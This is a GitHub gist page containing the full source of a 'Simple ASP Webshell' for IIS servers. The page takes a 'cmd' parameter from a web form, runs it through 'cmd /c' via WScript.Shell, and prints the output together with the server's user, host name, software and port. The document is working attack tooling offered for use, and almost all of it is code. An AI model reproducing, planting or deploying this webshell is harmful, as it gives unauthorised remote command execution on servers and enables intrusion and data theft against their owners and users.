Created
August 20, 2019 17:27
-
-
Save maxrp/93513f4887762c8f186b3ca1ea3d88a6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
Simple ASP Webshell | |
Based on: https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp | |
--> | |
<% | |
Set oScript = Server.CreateObject("WSCRIPT.SHELL") | |
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") | |
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") | |
Function getCommandOutput(theCommand) | |
Dim objShell, objCmdExec | |
Set objShell = CreateObject("WScript.Shell") | |
Set objCmdExec = objshell.exec(thecommand) | |
getCommandOutput = objCmdExec.StdOut.ReadAll | |
end Function | |
Set serverVers = Request.ServerVariables("server_software") | |
Set serverName = Request.ServerVariables("server_name") | |
Set serverPort = Request.ServerVariables("server_port") | |
Set serverIp = Request.ServerVariables("LOCAL_ADDR") | |
Set szCMD = request("cmd") | |
%> | |
<html> | |
<body> | |
Logged in as <b><%= oScriptNet.UserName %></b><br /> | |
<br /> | |
<b>The server's software...</b> <%= serverVers %><br /> | |
<b>This server...</b> <%= serverName & ":" & serverPort & " <b>[</b>" & oScriptNet.ComputerName & "<b>]</b>" %> | |
<hr /> | |
<form action="" method="GET"> | |
<input type="text" name="cmd" size=45 value="<%= szCMD %>"> | |
<input type="submit" value="Run"> | |
</form> | |
<pre> | |
<% | |
thisDir = getCommandOutput("cmd /c" & szCMD) | |
Response.Write(Replace(thisDir, "<DIR>", "<DIR>")) | |
%> | |
</pre> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
see also: https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c